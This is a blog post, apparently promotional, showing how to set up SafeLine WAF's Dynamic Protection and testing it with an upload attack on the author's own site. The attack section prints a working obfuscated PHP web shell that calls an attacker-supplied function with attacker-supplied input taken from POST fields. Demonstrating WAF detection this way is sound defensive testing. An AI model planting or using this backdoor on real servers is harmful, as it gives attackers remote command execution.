Real-World Attack Testing with SafeLine: A Guide to Dynamic Protection
Lulu
Posted on August 28, 2024
1. Introduction to SafeLine
Since 2016, Chaitin Tech has been committed to making cybersecurity accessible to everyone. They initially open-sourced SafeLine's semantic analysis engine and have since released various plugins and communication protocols associated with SafeLine. In April 2023, Chaitin took it a step further by launching a free community edition of SafeLine on GitHub. This move allows more developers and companies to experience the power of SafeLine’s semantic analysis algorithms at zero cost, aiming to advance the development and application of intelligent semantic analysis in cybersecurity.
2. Experiencing Dynamic Protection
Introduction to Dynamic Protection
The Dynamic Protection feature is a significant update to SafeLine WAF, designed to offer more flexible and efficient security defenses. It provides comprehensive protection for web applications by monitoring in real-time and dynamically adjusting protection strategies.
Adding Protected Sites
After logging in, navigate to "Web Services" and click "Add Web Service."
Enter the domain and port to be monitored, and in the upstream server field, input the internal address of your web server.
Configuring Dynamic Protection Resources
Before and After Protection
Dynamic Protection Review
As shown above, once you select the resources to protect, SafeLine informs you that the site is now protected by WAF. The original code on the page is replaced with obfuscated code, enhancing security significantly.
3. Attack Testing (Disclaimer: This was tested on my own site.)
Step 1: Constructing the Attack Code
I created a backdoor script that passes variables multiple times. Normally, this code wouldn't trigger any alarms. I then uploaded it via the web to see if SafeLine would detect it:
<?php
$username = $_POST['username'];
$password = $_POST['password'];
$shell = "username";
$variable = $password;
@$$shell($variable);
?>
Step 2: Upload Test
It quickly became clear that my upload operation failed. A quick check revealed that SafeLine had intercepted the upload.
Step 3: Backend Check
In the SafeLine dashboard, I could see that my site was under attack. The protection was solid, clearly marking the attacker's IP, logging the attack details, and even providing AI analysis options.
4. Relevant Links
Official Website: https://waf.chaitin.com
GitHub: https://github.com/chaitin/SafeLine
Posted on August 28, 2024
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.
Related
August 28, 2024